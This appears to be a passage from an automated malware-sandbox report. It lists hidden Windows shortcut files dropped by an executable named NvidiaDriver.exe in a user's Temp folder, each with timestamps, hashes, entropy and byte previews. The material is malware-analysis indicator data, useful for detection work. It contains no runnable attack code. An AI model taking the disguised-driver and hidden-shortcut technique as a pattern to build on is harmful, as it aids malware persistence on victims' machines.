                                                                                                                                          Preview:L..................F...."...'S...I...#`..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:51 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.933902314377249
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8H2Betq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:8WBetVRVf0qa0PjtyF
                                                                                                                                          MD5:F39375C5E400A1475A2776F431157AE8
                                                                                                                                          SHA1:79FA7E51B003551A5D10AC942B7EE955C3E3AB3C
                                                                                                                                          SHA-256:2476DF15193BFF7B2FAB04EF276BD918A3E9B7A6618F408C7AC9A9D66FA487AA
                                                                                                                                          SHA-512:43428A5DB8A0CA479E02171BE0B99CBEB9C3B7F998B16F8EC698D47ACCEA995A481B2CC7C451657DAEDDD818F3DEABA12B30962A1B1C2B11D02A8A3015657661
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..7.#..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:53 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.930329354641711
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nrBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8rBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:F437A4B1859658A74A684809B2C54DE0
                                                                                                                                          SHA1:7BA9E067946300D1008D24DD2A45F2D8855EF738
                                                                                                                                          SHA-256:9CFECC8F8BEB28D07158CBB08DA4086B33FEC84EAD27ED5B276A12CA00F49133
                                                                                                                                          SHA-512:AD4116D61A5C2261A5589499903DABD768C2D694AA420CB95CC842D0442D891EC5B667560E78A656A07C82B6EFD6C5BF4A72BFF9446F69C07A6122FC51968240
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I....a..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:38 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.937805312330312
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HZBetq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:85BetVRbf0qa0PjtyF
                                                                                                                                          MD5:DCEB49149AE5A2F474FEEE8E87F5EAAB
                                                                                                                                          SHA1:1E77A1E34CF245A186E61F88C9924F8861A397FE
                                                                                                                                          SHA-256:D83A0D878D66BFF4A762CF81BEE1C1A39FCCF967F5ABB4CAAFA21E27CACDEDD1
                                                                                                                                          SHA-512:0CFD19CFDB2155572899EB250DFC56120B3772898A3B70C980E84D0604F4466E41654C3E8DDC9FD415DDD617BF157EADA5431184B6131FDE2D089A37F3BEA4B6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...bX..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:57 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.932572360223889
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nkBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8kBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:BAB83CF04A82E526DA891B649B92ED79
                                                                                                                                          SHA1:9CADDA15EBA3A6CBB07C7C937DA439157237ABFD
                                                                                                                                          SHA-256:68D3B3F8E50CF29F4C41027B78723FADABD011FAC92F13714730E45810EF731D
                                                                                                                                          SHA-512:E306455300C863E024895F53AF6BA09C5D1BA0255222D4209E12F211DAE2B2211C3862A7572EE28CA6C935AD120C077B2739F8A5746F64B4F69790E1B531D1D4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.....I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:40 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.928928220734771
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nj+Betq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8j+BetVRbf0qa0lECjtyF
                                                                                                                                          MD5:5638D459CD6F5B8E9359E495832F7EFE
                                                                                                                                          SHA1:2463F0F0C88CD59A58146928DEF4D70EB04A16D5
                                                                                                                                          SHA-256:E9C04A99E10218622EAEA826C7CA7A1C061C3F5FD2C4D989C7F9EE880778CBC3
                                                                                                                                          SHA-512:18A9579623F35F8A547C3F9A37A35DF64BF3BE898C3C51A2D7B11D0060B8FE7D1C8764D9171A9FE95E9862F211F226F4957F7F1A7306FFD0B1C170B3B4E82DC5
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I...S...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:51 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.929171941956174
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nuBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8uBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:C675F3B7FC032147C116E11A5E6BB954
                                                                                                                                          SHA1:94737B1B410FE9C9AEE380E69715EF1801764C21
                                                                                                                                          SHA-256:6816037E007B954B35A45E1EED78D22564A39633DC5BCD0474457BEC8AC6C9D1
                                                                                                                                          SHA-512:C1B227CC5AC7E322CED7C9541B553C9616E9557FCA264F19080ED542061EDCC823C029692DFF14F0F5BF0F8F8FDDA61903D226E936D4F123F92F5ABCEE0A5878
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.../...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:48 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.934659296261328
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nQ2Betq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8Q2BetVRbf0qa0lECjtyF
                                                                                                                                          MD5:18BFFE3E95ACCE9B2C93D62C01E10006
                                                                                                                                          SHA1:4AB521ED62C9095D0E807107C9163858D41E2C8A
                                                                                                                                          SHA-256:5F56D61B048AB2B85EBCF291F3DE490D302930F57C47469C2381D02162B7D077
                                                                                                                                          SHA-512:0732D253EED1B25F2A49D612AC192920A4D4B15F63D71592EBC04CBF3331EBE9C1C5423278B1C9B91C9051DCFD3CFD8943A83B9DCD2AABA2BA92544224F358DB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I....*..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:55 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.930609831877778
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nGOBetq43HR6JgKA5PK2TXAqmfmOKlNmN3EjkqyFm:8GOBetVRVf0qa0lECjtyF
                                                                                                                                          MD5:1DD9FC6D25AF0DE11B1D22BE5DB40D74
                                                                                                                                          SHA1:7784808B316638B29FE44A662C5B47CB5DFA4939
                                                                                                                                          SHA-256:71680AA9715941C3C82164EB4DDC1A04AF17B91C728D90C0E20A7A92CC2E176D
                                                                                                                                          SHA-512:A47301D86B2B580454D4CD765CB36C59BFEB83BCEE5475DD4BB1B081F00B45961D7F0FF31F6C206B25AE03027336190E15289B38377D6E41522B10381B3D019D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..j....I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:41 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.930270972806528
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nikpBetq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8ikpBetVRbf0qa0lECjtyF
                                                                                                                                          MD5:DA43D0E72D158378A0F63EE7B33C9105
                                                                                                                                          SHA1:454800D09430E34266631508AC861F04C5899101
                                                                                                                                          SHA-256:9B4C55FD573A18CECC17CC99523EE4EE398E0812DC6259FEDEE299327719F766
                                                                                                                                          SHA-512:C9EAC6DC816A855ED30389C378F2E8CC3D9BFB14062AE5B78256D63DA574845EB9C36A36140E6DFA8BB09710B790A8387F1ED9F5A770C3D687697D26DD8977C2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..n.X..I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:39 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.937514882708982
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8H0Betq43HR6JgKAGsK2TXAqmfmOKm3EjkqyFm:8UBetVRbf0qa0PjtyF
                                                                                                                                          MD5:6707787288F4EB6DD9E6093F15337D35
                                                                                                                                          SHA1:FE79902FFB69A3FAF7B4773ACCDE28587D99F78F
                                                                                                                                          SHA-256:94734FB51366FE9EF918B36968D478A5EDEBE9814EAC996E53B441C7C243182A
                                                                                                                                          SHA-512:52AA051CCB666E641238D2D2B028E9458F6AA20B41B41A6FA4B56DB6FE6323D8878BE8959D74773261C91CB4F304EA29A95F2287068BB09F5691F718F2C4F3BF
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:43 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.935599564756998
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nZBetq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8ZBetVRbf0qa0lECjtyF
                                                                                                                                          MD5:4840E4A28527DA2E8EF7F67953F07948
                                                                                                                                          SHA1:C57FFBABB9FAAD4824D6CA9BA74FA45E207057B0
                                                                                                                                          SHA-256:9F2E738654F31FE16FABDDACFD32B44517892299029E7ABE9372DDE75F635EED
                                                                                                                                          SHA-512:E71AB3B7A4DF35FE95FB8E6F0DBD6FF0AD91EEC3109A3B78E53B59789E90FDFBC17ADC6826C7C611CB66B53A42F22394650CC4C71F36376DBBDA9AE1B7367B43
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I..'...I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................*...N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e...-.-.v.i.s.i.o.n.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:54 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1200
                                                                                                                                          Entropy (8bit):4.938391332667177
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8HSOBetq43HR6JgKA5PK2TXAqmfmOKm3EjkqyFm:8yOBetVRVf0qa0PjtyF
                                                                                                                                          MD5:36C9F1F440FC48D4193C1F8854CFAF2C
                                                                                                                                          SHA1:E759B559B91FA84A3D7611DFEE840551F9C553FB
                                                                                                                                          SHA-256:5C7DB3A72318C1509E3BA4376CFE3276DC8C330683AB5931953575E399EAE20B
                                                                                                                                          SHA-512:57DC3B6AFF97744DA531DD9D1BA80E0DDB5B8C1ECBD68875AE69A3043947C3100B1904EBCAEE1A3CF2F350A3F10AC001F92E2CA20FFF48BF22F2524AEF4C02E2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:L..................F...."...'S...I.......I.......I...d......................,.:..DG..Yr?.D..U..k0.&...&......vk.v....U.WI.I..#.t..I......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.............................%..A.p.p.D.a.t.a...B.P.1......Y....Local.<......CW.^.Y......b......................l*.L.o.c.a.l.....N.1......Y...Temp..:......CW.^.Y.....l.........................T.e.m.p.....b.1......Y...NVIDIA~1..J......Y..Y...........................Y|{.N.v.i.d.i.a.D.r.i.v.e.r.....n.2..d...Y.".NVIDIA~1.EXE..R......Y..Y...........................zY..N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.......n...............-.......m.............o......C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.N.v.i.d.i.a.D.r.i.v.e.r.\.N.v.i.d.i.a.D.r.i.v.e.r...e.x.e.........|....I.J.H..K..:...`.......X.......305090...........hT..CrF.f4... ..j[......,.......hT..CrF.f4... ..j[......,..................1S
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Hidden, Archive, ctime=Sun Dec 8 16:06:37 2024, mtime=Sun Dec 8 16:06:44 2024, atime=Sun Dec 8 16:06:37 2024, length=25600, window=hide
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1218
                                                                                                                                          Entropy (8bit):4.9302176628178
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:8nYBetq43HR6JgKAGsK2TXAqmfmOKlNmN3EjkqyFm:8YBetVRbf0qa0lECjtyF
                                                                                                                                          MD5:478D3941D1220E4105E15598022B5C9B
                                                                                                                                          SHA1:10EA2027362C08A8BA204DB917564A0BF68A2C2C
                                                                                                                                          SHA-256:6097E4F4C2C27D62E16E09F57407FE74D92B2B0B84D16A87176A6A90387BE1A5
